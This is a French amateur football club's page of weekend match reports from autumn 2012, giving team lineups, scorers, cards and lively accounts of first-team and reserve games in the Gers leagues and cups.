Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. C. Lecoublet, 5. T. Larribeau, 6. V. Taupiac (Cap), 7. W. Schoen, 8. T. Hrodej, 9. V. Lucas, 10. J. Lasserre, 11. M. Huntz. Rempl: 12. M. Xompero, 13. L. Delavat, 14. C. Maillasson, Coach: C. Boukkera But: T.Hrodej (10ème) Avertissements: Pour ce tour de Coupe des Réserves, les joueurs du Sporting se déplaçaient sur le terrain de St Sauvy, une équipe évoluant une division en dessous. Le match n’a débuté que depuis quelques secondes et les joueurs locaux sont déjà les premiers à se mettre en action, sur un décalage, l’attaquant va défier « Lolo » qui détourne du pied en corner. Les jaunes et rouges reprennent possession du ballon et à la 10ème minute « Bono » sert « Tom » au 18m qui d’un tir puissant croisé trompe le gardien, 0-1. St Clar continue son pressing, notamment par « Tom » très en jambe sur son côté droit, et sur un de ses centres « Taupi » au 6m cadre une jolie tête que le gardien détourne. « Taupi » encore lui sur une action bien construite se retrouve à l’entrée de la surface et frappe mais le gardien s’interpose encore une fois. N’ayant pas réussi à faire le break, les jaunes et rouges commencent à bafouiller leur football et à 5mn de la mi-temps sur une balle en profondeur l’attaquant local loupe le cadre de peu. Mi-temps 0-1. Au retour des vestiaires, St Sauvy revient avec d’autres ambitions et égalise sur une erreur défensive, l’attaquant ne se faisant pas prier pour lober « Lolo » sorti à sa rencontre, 1-1. Dans la foulée, St Sauvy continue d’attaquer, et réussit à marquer le 2ème but sur un manque de concentration de la défense des jaunes et rouges, 2-1. Il reste encore beaucoup de temps, mais les joueurs du Sporting vont mélanger vitesse et précipitation, et ils vont butter face à une ligne défensive bien en place, malgré un poteau de « Ludo » à 5mn de la fin, plus rien ne sera marqué. Elimination du Sporting dans cette compétition. La semaine prochaine retour au championnat avec un déplacement sur le terrain de Duran en espérant voir un autre visage de nos joueurs…
“Coach Bouki” qui distille ses conseils à la mi-temps
Résultats du week-end (17/11/12):
Belle soirée pour le Sporting
Ce week-end, la réserve du Sporting a confirmé sa bonne forme actuelle en remportant son match face à une vaillante équipe de Manciet tandis que l’équipe fanion s’est rattrapée de son non match du week-end dernier à Fleurance en marquant 4 buts face à Vallée de l’Arrats.
CHAMPIONNAT DE 1ère DIVISION : ST CLAR II – MANCIET II : 1-0
Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. C. Lecoublet, 5. T. Larribeau, 6. V. Taupiac (Cap), 7. Luc. Fabbro, 8. T. Hrodej, 9. C. Suzes, 10. C. Maillasson, 11. V. Lucas. Rempl: 12. J. Lasserre, 13. G. Maignaut, 14. P. Pinto, Coach: C. Boukkera But: C.Suzes (70ème) Avertissements: Le match débute sur les chapeaux de roue, « Bono » est le premier à se mettre en action dans son couloir droit, après plusieurs dribbles son tir est stoppé par le gardien. Manciet axe son jeu sur de grand ballon en profondeur pour son rapide attaquant, mais la défense des jaunes et rouges veille et lui laisse peu d’espace. Cette première mi-temps verra une domination St Claraise mais le score reste toujours vierge à la pause, 0-0. Après la pause des citrons, Manciet est tout près d’ouvrir le score sur leur seul et unique corner de la partie, mais le ballon frôla le poteau de « Lolo ». « Coach Bouki » opère à un changement tactique avec 3 attaquants devant et cela s’avère payant. Sur un dégagement de « Lolo », « Guillaume » dévie de la tête pour « Cissou » qui des 20m ne se fait pas prier pour expédier le ballon dans la lucarne, imparable, 1-0. Les jaunes et rouges continuent leur pressing pour faire le break mais « Christo » échoue sur le gardien en fin de partie. Fin du match, 1-0. Week-end prochain déplacement à St Sauvy en Coupe des Réserves. A noter : Le SCSC tient à féliciter « Captain Taupi » et « NJ » pour leur futur heureux évènement au sein de leur foyer…en espérant qu’il hérite de la Sagesse de sa maman 😉
“Cissou” buteur du soir en réserve
CHAMPIONNAT D’EXCELLENCE : ST CLAR – VALLEE DE L’ARRATS : 4-0
Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. R. Clavel, 4. A. Virelaude, 5. Benjamin. Peotta, 6. F. Larribeau, 7. F. Moussaron (Cap), 8. R. Boukkera, 9. S. Buttigieg, 10. C. Malateste, 11. Loic. Fabbro. Rempl: 12. Y. Abdou, 13. PM. Sabarros, 14. N. Cantaloup, Coach: J.Blancard Buts : C.Malateste (20ème) (65ème), F.Moussaron (55ème), N.Cantaloup (80ème) Avertissements: Y.Abdou ( Tacle dangereux), A.Davasse (Contestation), R.Boukkera (Tacle dangereux), R.Clavel (Anti jeu) Après sa défaite lors du derby face à Fleurance le week-end dernier, les joueurs du Sporting avaient à cœur de se racheter sur leur terrain face à une équipe accrocheuse de la Vallée de l’Arrats. Après les encouragements de l’équipe réserve dès leur match terminé et une motivation « Rugbystique » dont « Palof » a le secret, les jaunes et rouges sont les premiers à semettre en action, mais le tir trop écrasé de « Lolo » passe à côté des buts. S’ensuit un « round » d’observation, et à la 20ème minute « Papy » d’une transversale, passe le ballon à « Kinou » plein axe qui d’un pointu ouvre le score, 1-0. Dans la foulée, les visiteurs du soir sont tout près d’égaliser d’un tir croisé mais le ballon rase le poteau au grand soulagement de « Bats et des supporters ». Le match devient plus haché, les fautes se multiplient de chaque côté, et juste avant la pause « Kinou » s’écroule dans la surface mais l’arbitre n’accorde pas le pénalty. Mi-temps 1-0. Après la pause, « Nico » fraichement rentré obtient un pénalty « au métier » que « Mouss » se charge de tirer, mais le gardien adverse repousse le ballon en corner. Corner frappé par « Lolo » que « Mouss » reprend d’une tête rageuse pour marquer le but du break, 2-0. St Clar ne relâche pas ses efforts, « Lolo » encore lui lance « Kinou » en profondeur qui va marquer le 3ème but du match, 3-0. Vallée de l’Arrats dans un sursaut d’orgueil va se créer quelques actions chaudes mais « Bats » ne laissera rien passer. Pour clôturer cette belle soirée, « Nico » y va de son but, bien lancé en profondeur par « Mouss », il remporte son face à face avec le gardien, 4-0. Victoire qui va faire du bien au moral après deux revers consécutifs. Repos le week-end prochain, ce qui permettra de soigner les petits bobos de chacun après ce match physique.
“Lolo” et “Kinou” décisifs face à Vallée de l’Arrats
Résultats du week-end (10/11/12):
Résultats mitigés pour le Sporting
Ce week end deux derbys de la Lomagne étaient au programme pour les équipes du Sporting. Seule l’équipe II reviendra de Pauilhac avec la victoire…
CHAMPIONNAT DE 1ère DIVISION : PAUILHAC II – ST CLAR II : 2-4
Equipe: 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. C. Lecoublet, 5. T. Larribeau, 6. V. Taupiac (Cap), 7. V. Lucas, 8. W. Schoen, 9. F. Buot, 10. C. Maillasson, 11. M. Huntz. Rempl: 12. J. Lasserre, 13. T. Hrodej, 14. P. Pinto, Coach : C. Boukkera Buts: M.Berto (15ème), F.Buot (45ème), V.Lucas (55ème), J.Lasserre (70ème) Avertissements: T. Larribeau (faute grossière), F.Buot (comportement violent, carton rouge) Entre deux équipes qui se connaissent bien, la 1ère période sera très équilibrée. Les deux premiers buts du match seront marqués sur pénalty (“Mat” pour Saint-Clar) avant que “Bulle” attaquant du soir ne donne l’avantage au Sporting juste avant la pause. La seconde période verra une domination des Saint-Clarais qui marqueront 2 fois par “Bono” et” Pampouille” qui au passage deviennent meilleurs buteurs du club avec 4 réalisations chacun. Pauilhac ne réduira le score qu’en toute fin de match. Le seul regret dans ce match vient de l’expulsion d’un Saint-Clarais suite à un geste d’énervement. Samedi prochain réception de Manciet II.
CHAMPIONNAT D’EXCELLENCE : FLEURANCE II – ST CLAR : 3-0
Equipe: 1. Baptiste. Peotta, 2. A. Davasse, 3. R. Clavel, 4. A. Virelaude, 5. Benjamin. Peotta, 6. Y. Abdou, 7. F. Moussaron (Cap), 8. C. Malateste, 9. N. Canataloup, 10. C. Suzes, 11. Loic. Fabbro. Rempl: 12. R. Boukkera, 13. PM. Sabarros, 14. F. Larribeau, Coach: J.Blancard Avertissements: A. Virelaude (faute grossière), R.Boukkera (tacle dangereux) Après sa défaite face au Houga et une trève de 3 semaines à cause d’un curieux calendrier, l’équipe I partait à Fleurance un peu dans l’inconnu affronter une formation à la recherche de points. D’entrée de jeu, les locaux, dont la composition d ‘équipe montre toutes les ambitions, prennent le jeu à leur compte face à des visiteurs en manque de rythme. Face à la vitesse des attaquants Fleurantins, les Saint-Clarais n’arrivent pas à poser leur jeu et à la demi-heure de jeu, concèdent un pénalty. La pause est atteinte sur le score de 1 à 0. Après la pause et un repositionnement tactique de l’équipe, Saint-Clar se reprend mais sans arriver à réellement se procurer d’occasions. Au contraire, ils encaissent 2 nouveaux buts sur des contres qui prennent leur défense à revers. Fleurance s’impose logiquement et si l’on doit retenir un point positif de cette soirée, c’est le retour des blessés qui devrait redonner un peu de mordant à ce groupe pour la réception de Vallée de l’Arrats samedi.
“Bulle” ouvre son compteur but avec la Réserve lors du derby à Pauilhac
Résultats du week-end (20/10/12):
Mauvaise soirée pour le Sporting
Il y a des jours où rien ne va et ce fut le cas pour le Sporting Samedi soir. Cela commence par la pluie continue qui oblige les dirigeants à retracer le terrain une première fois avant le match de la réserve, puis encore entre les 2 matches et une troisième fois à la mi-temps du match de la Une et la soirée se termine avec 2 défaites.
CHAMPIONNAT DE 1ère DIVISION : ST CLAR II – AUCH III : 1-2
Equipe : 1. L. Gamot, 2. F. Buot, 3. M. Berto, 4. T. Larribeau, 5. Luc. Fabbro, 6. V. Taupiac (Cap), 7. W. Schoen, 8. D. Solagna, 9. C. Maillasson, 10. G. Maignaut, 11. V. Lucas. Rempl: 12. P. Pinto, 13. J. Lasserre, 14. M. Xompero, Coach : C. Boukkera But: G.Maignaut (30ème) Face à l’équipe III d’Auch qui fait peur à tout le monde (24 buts marqués en 2 matches), les réservistes saint-clarais ont fait mieux que se défendre. Malgré une domination des visiteurs, la défense locale tient bien le choc et offre quelques ballons de contre-attaque à ses attaquants. Auch finit par trouver la faille à la 20ème minute, mais Saint-Clar ne se décourage pas et 10mn plus tard, sur coup-franc, V. Lucas trouve G. Maignaut au second poteau qui égalise du plat du pied. La seconde période sera à l’image de la première avec des auscitains dominateurs mais qui ne parviennent pas à déstabiliser la défense jaune et noir jusqu’à la 85ème minute. Menés 2 à 1, Saint-Clar tente le tout pour le tout et est tout près d’égaliser par 2 fois. Dommage, le match nul n’aurait pas été volé.
CHAMPIONNAT D’EXCELLENCE : ST CLAR – LE HOUGA : 2-3
Equipe : 1. Baptiste. Peotta, 2. C. Lecoublet, 3. R. Boukkera, 4. A. Virelaude, 5. Benjamin. Peotta (Cap), 6. Y. Abdou, 7. T. Hrodej, 8. C. Suzes, 9. S. Buttigieg, 10. C. Malateste, 11. Loic. Fabbro. Rempl: 12. S. Jeangrand, 13. A. Mouchet, 14. N. Cantaloup, Coach: J.Blancard Buts: C.Suzes (80ème), N.Cantaloup (90ème) Privés de quelques titulaires et sur un terrain très glissant, l’équipe I n’a pas réussi à se défaire d’une équipe folgarienne qui n’a pas volé sa victoire. Dès l’entame du match, si le attaquants locaux se procurent quelques occasions, la défense laisse apparaître une fébrilité de mauvaise augure face aux rapides attaquants visiteurs et dès la 20ème, Saint-Clar encaisse un premier but. 15 mn plus tard, Le Houga récidive et mène 2 à 0 à la pause. Dès la reprise, les locaux s’installent dans le camp du Houga mais se font très vite surprendre sur un contre. A 3 à 0 ; les choses deviennent compliquées », d’autant que les attaquants saint-clarais butent sur un gardien visiteur en état de grâce. C. Suzes redonne espoir aux siens sur un centre qui trompe tout le monde et finit sa course dans le but adverse. En fin de match, Saint-Clar réduit le score par N. Cantaloup mais il est trop tard et Le Houga conserve le score jusqu’au bout. Samedi prochain, repos (gastronomique avec la soirée « Choucroute ») pour tout le monde en espérant que cette pause permette de récupérer quelques blessés pour la suite d’un Championnat qui s’annonce indécis.
Résultat du week-end (13/10/12):
COUPE DU GERS : ST CLAR – COLOGNE/SARRANT: 3-1
Equipe : 1. Baptiste. Peotta, 2. A. Davasse, 3. M. Berto, 4. F. Larribeau, 5. Benjamin. Peotta (Cap), 6. A. Virelaude, 7. PM. Sabarros, 8. C. Suzes, 9. S. Buttigieg, 10. S. Jeangrand, 11. Loic. Fabbro. Rempl: 12. V. Taupiac, 13. V. Lucas, 14. C. Malateste, Coach: J.Blancard Buts : S. Buttigieg (5ème), L. Fabbro (55ème), C. Malateste (70ème) Avertissements: F. Larribeau (faute grossière) Pour ce premier tour de Coupe du Gers, les St Clarais étaient opposés à Cologne/Sarrant, une équipe évoluant une division en dessous. D’entrée de match les jaunes et rouges prennent possession du ballon et les occasions vont se multiplier mais le gardien adverse détourne les tirs. Il faut attendre la 5ème minute de jeu, pour voir « Simon » hérité d’un ballon dans la surface et être fauché par le défenseur adverse, pénalty indiscutable que le jeune « Stephen » transforme sans trembler, 1-0. St Clar continue d’attaquer, un « Cissou » en feu sur son côté droit va multiplier les courses et les centres mais nos attaquants font preuve de maladresse dans leur dernier geste. On s’approche de la pause, quand Cologne obtient son premier corner du match, boxé par « Bats », récupéré par un adversaire qui s’empresse de tirer sur le genou de son défenseur qui pousse le ballon au fond des filets, 1-1. Après la pause des citrons, les St Clarais reprennent leur marche en avant, et sur une subtile passe en profondeur de « Stephen », « Lolo Fabbro » va battre le gardien d’un plat du pied, 2-1. L’entrée en jeu de « Kinou » va permettre aux jaunes et rouges de monopoliser le ballon. Sur une action individuelle, « Kinou » laisse sur place la défense de Cologne mais va buter sur le gardien. Sur une contre-attaque, l’attaquant adverse va faire passer un petit frisson à la défense St Claraise mais son tir passe au-dessus des buts. Le pressing s’accentue et sur une récupération de « Taupi », « Cissou » d’une passe lobée lance « Kinou » en profondeur qui ne se fait pas prier pour marquer le but du break, 3-1. On se rapproche de la fin du match quand « Bono », rentré en cour de jeu est tout près d’inscrire le 4ème but de la partie mais le ballon lui passe au-dessus du pied. Le score ne bougera plus. Qualification des St Clarais pour le prochain tour de la Coupe du Gers.
“Bono, Mat et Taupi” promus en Equipe I ce week-end Les buteurs de la soirée “Kinou, Stephen et Lolo”
Résultats du week-end (06/10/12):
CHAMPIONNAT D’EXCELLENCE : ST CLAR – DURAN: 2-1
Equipe : 1. Baptiste. Peotta, 2. PM. Sabarros, 3. R. Clavel, 4. A. Virelaude, 5. Benjamin. Peotta (Cap), 6. Y. Abdou, 7. F. Moussaron, 8. C. Suzes, 9. N. Cantaloup, 10. C. Malateste, 11. Loic. Fabbro. Rempl: 12. A. Mouchet, 13. F. Buot, 14. S. Buttigieg, Coach: J.Blancard Buts : F. Moussaron (45ème), S. Buttigieg (75ème) Avertissements : PM. Sabarros (faute grossière) Après la bonne prestation de l’équipe en Coupe du Midi ; les supporters du Sporting espéraient la même performance face à Duran. Malheureusement, face à des visiteurs très vifs en attaque et plutôt rugueux en défense, l’équipe I a non seulement connu beaucoup de difficultés pour s’imposer, mais a surtout vu les blessures s’accumuler. D’entrée de jeu, les jaunes et rouges qui jouaient d’ailleurs en blanc, sont pris à la gorge par le pressing visiteur et dès la 5ème minute, « Narbé » rate sa passe et l’attaquant adverse, après avoir fixé « Papy », trompe « Bats » d’une frappe à ras de terre, 0-1. Dès lors, Saint-Clar se rue à l’attaque mais de façon très brouillonne et n’arrive pas à inquiéter le gardien adverse. Pire, ils s’exposent même à des contres qui font passer quelques frissons chez les spectateurs. Commence alors la série de mauvaises nouvelles, « Yasser » doit quitter ses camarades à cause d’une cheville très douloureuse. Il est remplacé par « Antho ». Heureusement, juste avant la pause, « Nico » entre dans la surface et est bousculé par un défenseur. Pénalty indiscutable que « Mouss » se charge de transformer, 1-1. Le second acte démarre sur les mêmes bases avec une équipe locale qui domine mais de façon stérile avec trop de déchets techniques. A l’heure de jeu, suite à une balle cafouillée par la défense de Duran, c’est le jeune « Stephen » tout juste entré en jeu qui ouvre son compteur but au Sporting et qui permet aux siens de mener 2 à 1. Ce même « Stephen » est tout près de récidiver sur une superbe reprise de volée acrobatique qui rase la transversale. C’est à ce moment-là que « Mouss » doit quitter le terrain, ressentant un point derrière la cuisse. La série continue avec « Raphy » qui, suite à un duel, grimace de douleur en se tenant la cheville. Malgré tout ces coups du sort, les jaunes et rouges conserveront leur but d’avance au terme d’un match dont on ne retiendra que le résultat. Des nouvelles rassurantes de « Raphy » : Après avoir été conduit aux Urgences par les pompiers, les premiers examens n’ont pas révélé de fracture et cela semble moins grave que ce que l’on craignait. Courage à toi, « Raphy », le Sporting pense bien fort à toi.
“Stephen” auteur de son 1er but sous les couleurs du Sporting
CHAMPIONNAT DE 1ère DIVISION : ST CLAR II – ORDAN LARROQUE II : 8-2
Equipe : 1. L. Gamot, 2. D. Solagna, 3. P. Pinto, 4. C. Lecoublet, 5. Luc. Fabbro, 6. V. Taupiac (Cap), 7. T. Hrodej, 8. V. Lucas, 9. M. Huntz, 10. S. Jeangrand, 11. C. Maillasson. Rempl: 12. T. Larribeau, 13. W. Schoen, 14. J. Lasserre, Coach : C. Boukkera Buts : J. Lasserre (2), S. Jeangrand (2), M. Huntz (2), W. Schoen, V. Lucas Avertissements : Les réservistes ont soigné leur goal-average face à une courageuse équipe d’Ordan Larroque. En effet, les visiteurs sont arrivés à 11, sans aucun dirigeant et ont fait ce qu’ils ont pu, parfois très bien d’ailleurs, le tout dans un très bon état d’esprit. L’absence de dirigeants a contraint nos 2 Co-Présidents, « JP et JJ », à officier comme arbitres-assistants. Dès l’entame, Saint-Clar domine le match mais Ordan tente quelques contres rapides. Après plusieurs occasions gâchées, c’est « Simon » qui ouvre la marque d’une astucieuse pichenette au quart d’heure de jeu, 1-0. Mais sur un oubli de notre défense, Ordan Larroque égalise dans la foulée, 1-1. Afin de donner plus d’efficacité, « Coach Bouki » fait aussitôt un premier remplacement en sortant « Simon », un peu à court de forme, par « Pampouille » qui s’illustre aussitôt en doublant la mise, 2-1. La fin de la première période sera difficile pour les visiteurs qui encaissent 2 nouveaux buts de « Michou » et « Bono ». Mi-temps atteinte sur le score de 4-1. La pause est profitable à Ordan qui démarre pied au plancher et réduit le score sur un nouveau contre, 4-2. A partir de là, la fatigue se fait sentir pour les visiteurs qui vont encaisser 4 nouveaux buts par « Willy », « Michou », « Simon » et « Pampouille ». La fin du match sera sifflée sur un score de 8-2 en faveur de nos Réservistes.
L’équipe II victorieuse de ce week-end
Résultats du week-end (29/09/12) :
2ème Tour de COUPE DU MIDI: ST CLAR – BEAUMONT DE LOMAGNE : 2-3
Equipe : 1. Baptiste. Peotta, 2. B. Sabarros, 3. R. Clavel, 4. PM. Sabarros, 5. Benjamin. Peotta (Cap), 6. A. Virelaude, 7. L. Fabbro, 8. C. Suzes, 9. S. Buttigieg, 10. L. Delavat, 11. R. Boukkera. Rempl: 12. T. Hrodej, 13. F. Buot, 14. A. Davasse, Coach : J. Blancard Buts : L. Delavat (35ème), Csc (85ème) Avertissements : Baptiste. Peotta (charge dangereuse) Pour ce 2ème tour de Coupe du Midi, l’équipe 1 de Saint-Clar recevait leur voisin de Beaumont de Lomagne, pensionnaire de Promotion Ligue. Pour composer son équipe, coach “Julien” a dû tenir compte des différents forfaits, soient pour laisser reposer l’organisme de certains (petits bobos), soit pour que d’autres aillent tester le leur Outre Rhin… C’est contre le vent et sans complexe que nos joueurs entament la partie. Ils font jeu égal avec l’adversaire jusqu’à cette 10ème minute où, après un déboulé côté droit, l’attaquant Beaumontois étrangement seul, reçoit le ballon et ajuste “Bats” qui ne peut que constater les dégâts. Sans se décourager nos joueurs essaient de reprendre leur esprit, mais la domination de l’adversaire se fait de plus en plus sentir. D’ailleurs, à la 17 ème minute, un tir des vingt mètres dans l’axe va se loger sous la transversale de “Bats” et porter le score à 2-0 pour les visiteurs. On aurait pu croire que la messe était dite, mais c’était sans compter sur la patience et le respect des consignes de “Julien” pour construire et se créer des actions de but.. Aussi, sur l’une d’entre elle, côté “Raphy-Lolo”, “Ludo” va couper un centre au 1er poteau pour réduire le score. Dès lors, les mouches ont changé d’âne, Saint-Clar prend les choses en main, pousse les attaques, obtient des corners, des coups francs bien placés, mais rien ne sera marqué jusqu’à la pose. Mi-temps 1 à 2. Il n’aura pas fallu longtemps à Beaumont pour se montrer dangereux en ce début de seconde mi-temps car dès la 3ème minute le ballon va s’écraser sur la transversale de “Bats”. Mais comme ce match est riche en rebondissement, sur la contrattaque qui suit, menée rondement par nos Saint-Clarais, “Ludo” va voir son pied bloqué par un adversaire au moment de son tir. Son genou n’aura d’ailleurs pas supporté ce blocage et il devra laisser sa place à “Nono” dès la 10 ème minute de cette seconde période. Les occasions se multiplient des deux côtés ce qui permettra aux deux portiers de montrer leurs talents. D’abord “Bats” va détourner un tir côté gauche, puis son homologue Beaumontois va empêcher “Benben” d’enlever la toile d’araignée dans sa lucarne gauche. Sur le corner qui suit, il s’illustrera encore une nouvelle fois par une parade impossible. Les ennuis continuent côté blessures, car “Benben”, au four et au moulin, en disputant un ballon, va devoir, comme son adversaire d’ailleurs, quitter ses camarades. Le second genou dans ce match plus celui “Arnaud Frugier” en réserve…bon rétablissement à tous. Le suspens continue car à 2-1 tout est encore possible. Mais à la 43 ème minute sur un corner défensif, une tête mal ajustée d’un des nôtres va offrir le ballon du 3ème but à l’attaquant Beaumontois qui du plat du pied ne se fait pas prier. Il reste encore quelques minutes plus le long temps additionnel dû à la blessure de “Benben”, et les nôtres, dans un sursaut d’orgueil, se ruent à l’attaque. C’est sur un corner et dans un cafouillage aérien que le ballon finira au fond des filets. Ce but sera contesté par le banc Beaumontois qui réclamait une charge sur le gardien mais l’arbitre valide le but. Sur la relance un attaquant visiteur parti à la limite du hors-jeu (mais quelle limite) va s’empaler sur “Bats” sorti à sa rencontre pour préserver sa cage. Le coup-franc qui s’en suit ne donnera rien et la fin du match sera sifflée sur ce score de 3 à 2 pour les visiteurs. L’équipe n’a pas à rougir de cette défaite et encore une fois, elle nous a prouvé qu’elle pouvait rivaliser avec des divisions supérieures. Les prestations des jeunes joueurs comme “Stephen” et l’entrée en cours de jeu de “Tom” sont plus que prometteuses. L’expérience et la combativité des plus anciens sont rassurantes. L’effectif à l’air riche, les places vont être chères. Les titulaires « indiscutables » n’ont qu’à bien se tenir.
“JP” et “Julien” en pleine discussion d’avant match Les St Clarais pendant leur échauffement
Entrée des deux équipes sur le terrain
COUPE DES RESERVES: VALLEE DE L’ARRATS II – ST CLAR II : 1-2
Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. C. Lecoublet, 5. T. Larribeau (Cap), 6. A. Frugier 7. C. Maillasson, 8. F. Gobatto, 9. P. Pracca, 10. M. Huntz, 11. V. Lucas. Rempl: 12. F. Cau, 13. G. Maignaut, 14. P. Pinto. Coach : C. Boukkera Buts : C. Maillasson (75ème ), V.Lucas (89ème) Avertissements : Pour ce « lointain » déplacement à Aubiet, coach « Boukki » avait calculé un super timing qui a permis d’une part aux joueurs, notamment les anciens « Titi » et « Pepe », de se dégourdir longuement les jambes et d’autre part à certains d’arriver à l’heure après s’être perdu dans….Aubiet ! (Non, nous ne dirons pas les noms). Grosse inquiétude avant même le match avec l’absence de l’arbitre officiel. C’est donc un dirigeant local qui a pris le sifflet et nous devons reconnaître qu’il a réalisé une prestation remarquable et qu’il a participé grandement à la qualité du match. Les Saint-Clarais choisissent de débuter le match contre le vent et subissent la domination de leurs adversaires mais sans vrai danger pour « Lolo ». Les jaune et rouge procèdent en contre grâce aux nombreux ballons ratissés par « Cedrick » et « Arnaud ». Malheureusement pour ce dernier, il se blesse au genou dès la 10ème minute et doit abandonner ses camarades au profit de « Faby ». La première période reste équilibrée avec de bonnes actions des 2 côtés mais pas de véritables occasions. Mi-temps : 0 à 0. Dès la reprise, Saint-Clar se procure une énorme occasion sauvée par 2 superbes parades du gardien local et, comme souvent dans pareil cas, Aubiet lance un contre rapide qui déborde la défense. « Lolo » dévie une première frappe mais sur un adversaire qui conclue. 1 à 0 pour Aubiet. Saint-Clar repart à l’attaque et, 5mn plus tard, « Faby » lance « Bono » sur le côté droit, lequel entre dans la surface, fixe 2 défenseurs et centre en retrait pour « Christopher » qui marque du plat du pied. Saint-Clar, avec l’aide du vent, domine cette période et se crée quelques occasions par « Faby » qui tente sa chance de loin ou « Bono » et « Christopher » qui tentent de déborder la défense mais en vain. Aubiet procède par contre, en particulier du côté gauche et « Titcho » doit s’employer à plusieurs reprises pour museler son vis à vis. On semble s’acheminer vers les prolongations quand, à la 89ème minute, « Guillaume » récupère un ballon côté gauche et adresse un centre parfait pour « Bono » au point de pénalty, qui contrôle le ballon et ajuste le gardien d’une belle frappe enroulée pleine lucarne. Les réservistes se qualifient donc pour les 1/8ème de finale au terme d’un match très plaisant, joué dans un excellent état d’esprit et, redisons le remarquablement arbitré. Le SCSC souhaite un prompt rétablissement à « Arnaud ».
” Bono” auteur du but de la qualification pour les 1/8ème de finale
Résultats du week-end (23/09/12):
CHAMPIONNAT D’EXCELLENCE: LABEJAN – ST CLAR : 2-3
Equipe : 1. Baptiste. Peotta, 2. F. Buot, 3. R. Boukkera, 4. F. Larribeau, 5. Benjamin. Peotta, 6. A. Davasse, 7. F. Moussaron, 8. L. Fabbro, 9. N. Cantaloup (Cap), 10. C. Malateste, 11. L. Delavat. Rempl: 12. T. Hrodej, 13. S. Buttigieg, 14. C. Suzes, Coach : J. Blancard Buts : N. Cantaloup (40ème), F. Moussaron (55ème), C. Suzes (70ème) Avertissements : R. Boukkera (tacle dangereux) Les joueurs de l’équipe fanion étaient aussi du déplacement à Labejan en ce dimanche après-midi. Un début de match timide des deux côtés avec peu d’occasion. Il faut attendre la 20ème minute pour voir une frappe de « Kinou » rebondir sur la barre. A la 30ème minute sur une balle en profondeur anodine, « Bats » et « Nono » ne se comprennent pas et l’attaquant local en profite pour marquer, 1-0. Ce but permet de réveiller les jaunes et rouges, ils commencent à enfin rentrer dans leur match et à 10 minutes de la pause, sur une transversale de « Robi », « Lolo Fabbro » sur le côté droit centre au premier poteau pour « Nico » qui ne se fait pas prier pour égaliser, 1-1. Juste avant la pause, « Mouss » transperce la défense et d’un centre appuyé trouve « Nico » au 6m mais son tir n’est pas cadré. Mi-temps : 1-1. Après la pause des citrons, les joueurs du Sporting continuent leur pressing, « Nico » récupère un centre, efface son défenseur mais s’écroule dans la surface, pénalty. « Mouss » le transforme en prenant le gardien à contre pied, 1-2. Les joueurs de Labejan ne sont dangereux que sur coups de pieds arrêtés mais la défense de St Clar est vigilante autour de bon « Papy ». « Coach Julien » procède à 3 changements d’un coup qui vont s’avérer payant, puisque dans la foulé, sur une passe en retrait d’un défenseur local pour son gardien, « Cissou » qui avait bien senti le coup, récupère le ballon dans les pieds du goal mais il s’écroule dans la surface, ceinturé par le gardien, pénalty et carton rouge. « Cissou » se fait justice lui-même en transformant le pénalty, 1-3. Les joueurs de St Clar gèrent leur avance mais à 5 minutes de la fin du match, sur un duel aérien dans la surface, l’arbitre désigne le point de pénalty pour Labejan, 2-3. Les locaux reprennent espoir et sur une dernière attaque, l’attaquant local rate sa reprise pour le bonheur des supporteurs Saint-Clarais. Dans les dernières secondes du match « Ludo » lancé en profondeur par « Stephen » manque l’occasion d’aggraver le score pour le Sporting. L’arbitre siffle la fin du match. Une victoire référence pour ce début de championnat. Le week-end prochain réception de Beaumont de Lomagne (PL) en Coupe du Midi au Stade de Labarthète.
L’équipe fanion victorieuse à Labejan “Cissou” qui transforme son pénalty
La joie des joueurs dans le vestiaire
CHAMPIONNAT DE 1ère DIVISION: LABEJAN II – ST CLAR II : 2-4
Equipe : 1. G. Lauriti, 2. D. Solagna, 3. M. Berto, 4. C. Lecoublet, 5. T. Larribeau, 6. V. Taupiac (Cap), 7. W. Schoen, 8. M. Huntz, 9. V. Lucas, 10. J. Lasserre, 11. A. Frugier. Rempl: 12. P. Pinto, 13. P. Pracca, 14. C. Maillasson. Coach : C. Boukkera Buts : M. Huntz (25ème), V. Taupiac (55ème), C. Maillasson (75ème ), V.Lucas (90ème) Avertissements : C. Maillasson (anti-jeu), V. Lucas (contestation) Pour ce deuxième match de championnat, les réservistes St Clarais se déplaçaient à Labejan. Le début du match voit les jaunes et rouges prendre possession du ballon avec un « Taupi » très présent au milieu de terrain mais au bout de 20 minutes de jeu sur une balle en profondeur, c’est Labejan qui ouvre le score sur une mésentente défensive, 1-0. Dans la foulée de l’engagement, « Arnaud Frugier » décale plein axe « Michou » au 20m qui d’un tir tendu trouve la lucarne, 1-1. St Clar continue d’attaquer mais ni les occasions de « Bono » et ni la tentative de lob de « Will » juste avant la pause ne font mouche. Mi-temps : 1-1. Après la pause des citrons, les jaunes et rouges confisquent le ballon, et c’est « Taupi » après un bon travail de « Bono » qui marque d’un tir croisé du gauche, 1-2 et signe ainsi son retour en réserve. Les joueurs du Sporting vont se procurer plusieurs balles de break notamment par « Michou » mais il frappe à deux reprises sur les poteaux. Et à 15 minutes de la fin, « Taupi » omniprésent dans ce match lance en profondeur « Christopher » qui d’un superbe lob de 25m marque son premier but sous ses nouvelles couleurs, 1-3. Les St Clarais gèrent leur match mais un but venu d’ailleurs de la part d’un joueur de Labejan, une frappe de 40m en cloche, va tout relancé, 2-3. Labejan pousse, mais la charnière centrale « Cedrik-Titi » ne laisse que des miettes et c’est « Bono » juste avant le coup de sifflet final bien lancé par « Taupi » encore une fois qui va remporter son duel avec le gardien adverse, 2-4. Le score ne bougera plus. Victoire à l’extérieur pour les réservistes. Le week-end prochain déplacement à Aubiet pour la Coupe des Réserves.
Les joueurs du SCSC à l’entrée du terrain L’équipe réserve victorieuse à Labejan
Résultat du week-end (15/09/12):
3ème Tour de la COUPE DE FRANCE : ST CLAR – SEMEAC : 2-3
